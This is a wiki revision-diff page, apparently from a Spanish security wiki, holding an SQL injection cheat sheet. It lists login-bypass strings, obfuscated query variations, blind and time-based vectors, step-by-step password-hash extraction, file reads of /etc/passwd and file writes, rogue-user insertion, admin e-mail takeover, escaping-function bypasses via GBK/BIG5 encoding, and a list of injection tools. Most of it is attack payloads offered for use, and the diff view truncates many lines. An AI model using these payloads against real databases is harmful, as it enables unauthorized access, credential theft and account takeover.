meta data de esta página
Diferencias
Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
seguridad:sql_injection [2013/03/18 09:36] – [SQL Injection] lc | seguridad:sql_injection [2023/01/18 14:11] (actual) – editor externo 127.0.0.1 | ||
---|---|---|---|
Línea 1: | Línea 1: | ||
==== SQL Injection ==== | ==== SQL Injection ==== | ||
=== Técnicas === | === Técnicas === | ||
+ | < | ||
* /**/ | * /**/ | ||
* /*--*/ | * /*--*/ | ||
Línea 7: | Línea 8: | ||
* %0A | * %0A | ||
* %0D | * %0D | ||
+ | </ | ||
- | < | + | === Técnicas extraidas |
+ | <code sql> | ||
1 SELECT * FROM login /* foobar */ | 1 SELECT * FROM login /* foobar */ | ||
2 SELECT * FROM login WHERE id = 1 or 1=1 | 2 SELECT * FROM login WHERE id = 1 or 1=1 | ||
3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE " | 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE " | ||
+ | </ | ||
Use inside login form: | Use inside login form: | ||
+ | < | ||
01 1' OR 1=1-- | 01 1' OR 1=1-- | ||
02 1' OR ' | 02 1' OR ' | ||
Línea 35: | Línea 39: | ||
20 ' or a=a-- | 20 ' or a=a-- | ||
21 " or " | 21 " or " | ||
+ | </ | ||
Variations: | Variations: | ||
+ | <code sql> | ||
01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 | 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 | ||
02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE " | 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE " | ||
Línea 48: | Línea 53: | ||
10 SELECT host, | 10 SELECT host, | ||
11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host, | 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host, | ||
+ | </ | ||
Blind injection vectors collection | Blind injection vectors collection | ||
+ | <code sql> | ||
Operators | Operators | ||
+ | |||
1 SELECT 1 && 1; | 1 SELECT 1 && 1; | ||
2 SELECT 1 || 1; | 2 SELECT 1 || 1; | ||
3 SELECT 1 XOR 0; | 3 SELECT 1 XOR 0; | ||
+ | </ | ||
+ | <code sql> | ||
Evaluate | Evaluate | ||
1 all render TRUE or 1. | 1 all render TRUE or 1. | ||
Línea 60: | Línea 68: | ||
3 SELECT 2 >= 2; | 3 SELECT 2 >= 2; | ||
4 SELECT ISNULL(1/ | 4 SELECT ISNULL(1/ | ||
+ | </ | ||
+ | <code sql> | ||
Math | Math | ||
1 SELECT FLOOR(7 + (RAND() * 5)); | 1 SELECT FLOOR(7 + (RAND() * 5)); | ||
2 SELECT ROUND(23.298, | 2 SELECT ROUND(23.298, | ||
+ | </ | ||
+ | <code sql> | ||
Misc | Misc | ||
1 SELECT LENGTH(COMPRESS(REPEAT(' | 1 SELECT LENGTH(COMPRESS(REPEAT(' | ||
2 SELECT MD5(' | 2 SELECT MD5(' | ||
+ | </ | ||
+ | <code sql> | ||
Benchmark | Benchmark | ||
01 SELECT BENCHMARK(10000000, | 01 SELECT BENCHMARK(10000000, | ||
Línea 81: | Línea 92: | ||
10 Using the timeout to check if user exists | 10 Using the timeout to check if user exists | ||
11 SELECT IF( user = ' | 11 SELECT IF( user = ' | ||
+ | </ | ||
Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | ||
Gathering info | Gathering info | ||
+ | <code sql> | ||
Table mapping | Table mapping | ||
1 SELECT COUNT(*) FROM tablename | 1 SELECT COUNT(*) FROM tablename | ||
+ | </ | ||
+ | <code sql> | ||
Field mapping | Field mapping | ||
1 SELECT * FROM tablename WHERE user LIKE " | 1 SELECT * FROM tablename WHERE user LIKE " | ||
Línea 92: | Línea 105: | ||
3 SELECT * FROM tablename WHERE user = ' | 3 SELECT * FROM tablename WHERE user = ' | ||
4 SELECT * FROM tablename WHERE user = ' | 4 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
User mapping | User mapping | ||
1 SELECT * FROM tablename WHERE email = ' | 1 SELECT * FROM tablename WHERE email = ' | ||
2 SELECT * FROM tablename WHERE user LIKE " | 2 SELECT * FROM tablename WHERE user LIKE " | ||
3 SELECT * FROM tablename WHERE user = ' | 3 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
Advanced SQL vectors | Advanced SQL vectors | ||
Writing info into files. | Writing info into files. | ||
1 SELECT password FROM tablename WHERE username = ' | 1 SELECT password FROM tablename WHERE username = ' | ||
+ | </ | ||
+ | <code sql> | ||
Writing info into files without single quotes: (example) | Writing info into files without single quotes: (example) | ||
1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | ||
2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39), | 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39), | ||
3 CHAR( 39)) | 3 CHAR( 39)) | ||
- | |||
Note: You must specify a new file, it may not exists and give the correct pathname. | Note: You must specify a new file, it may not exists and give the correct pathname. | ||
+ | </ | ||
+ | <code sql> | ||
The CHAR() quoteless function. | The CHAR() quoteless function. | ||
1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | ||
Línea 114: | Línea 130: | ||
3 | 3 | ||
4 SELECT * FROM login WHERE user = CHAR(39, | 4 SELECT * FROM login WHERE user = CHAR(39, | ||
+ | </ | ||
+ | <code sql> | ||
Extracting hashes | Extracting hashes | ||
1 SELECT user FROM login WHERE user = ' | 1 SELECT user FROM login WHERE user = ' | ||
2 UNION SELECT IF(SUBSTRING(pass, | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
This evaluates the first char of the password hash from user ' | This evaluates the first char of the password hash from user ' | ||
Línea 124: | Línea 141: | ||
The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | ||
+ | <code sql> | ||
01 SELECT user FROM login WHERE user = ' | 01 SELECT user FROM login WHERE user = ' | ||
02 UNION SELECT IF(SUBSTRING(pass, | 02 UNION SELECT IF(SUBSTRING(pass, | ||
Línea 135: | Línea 153: | ||
10 is like: (password, | 10 is like: (password, | ||
11 is like: (password, | 11 is like: (password, | ||
+ | </ | ||
A quoteless example: | A quoteless example: | ||
+ | <code sql> | ||
1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | ||
2 UNION SELECT IF(SUBSTRING(pass, | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
Possible chars | Possible chars | ||
0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 | 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 | ||
Misc. | Misc. | ||
Insert a new user into DB | Insert a new user into DB | ||
+ | <code sql> | ||
1 INSERT INTO login SET user = ' | 1 INSERT INTO login SET user = ' | ||
+ | </ | ||
Retrieve /etc/passwd file, put it into a field and insert a new user. | Retrieve /etc/passwd file, put it into a field and insert a new user. | ||
- | 1 load data infile "/ | + | < |
Then login! | Then login! | ||
Write the DB user away into tmp | Write the DB user away into tmp | ||
- | 1 SELECT host, | + | <code sql>1 SELECT host, |
Change admin e-mail, for " | Change admin e-mail, for " | ||
- | 1 UPDATE users set email = ' | + | < |
Bypassing PHP functions | Bypassing PHP functions | ||
Bypassing addslashes() with GBK HEX encoding. | Bypassing addslashes() with GBK HEX encoding. | ||
- | 1 WHERE x = 0xbf27 admin 0xbf27 | + | < |
Using an HEX encoded query to bypass escaping. | Using an HEX encoded query to bypass escaping. | ||
+ | <code sql> | ||
1 Normal: SELECT * FROM login WHERE user = ' | 1 Normal: SELECT * FROM login WHERE user = ' | ||
2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | ||
+ | </ | ||
Inserting a new user in SQL. | Inserting a new user in SQL. | ||
+ | < | ||
1 Normal: insert into login set user = ' | 1 Normal: insert into login set user = ' | ||
2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 | 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 | ||
+ | </ | ||
How to determin the HEX value for injection. | How to determin the HEX value for injection. | ||
- | 1 SELECT HEX(' | + | <code sql>1 SELECT HEX(' |
With comments. | With comments. | ||
+ | < | ||
1 S/ | 1 S/ | ||
2 W/ | 2 W/ | ||
+ | </ | ||
Bypassing mysql_real_escape_string() with BIG5 or GBK | Bypassing mysql_real_escape_string() with BIG5 or GBK | ||
- | 1 " | + | < |
(MySQL 4.1.x before 4.1.20 and 5.0.x) | (MySQL 4.1.x before 4.1.20 and 5.0.x) | ||
- | === Herramientas === | + | ==== Herramientas |
- | Havij -> http:// | + | |
+ | * Havij http:// | ||
+ | * PonyMagic http:// | ||
+ | * General Injection Explorer | ||
+ | * Safe 3 sql injector http:// | ||
+ | * Enema http:// | ||
+ | * Absinthe http:// | ||
+ | * Pangolin http:// | ||
+ | * sql poison | ||
+ | * sql map gui | ||
+ | * bsql hacker http:// | ||
+ | * | ||
Línea 189: | Línea 223: | ||
==== Referencias ==== | ==== Referencias ==== | ||
* http:// | * http:// | ||
+ | * http:// |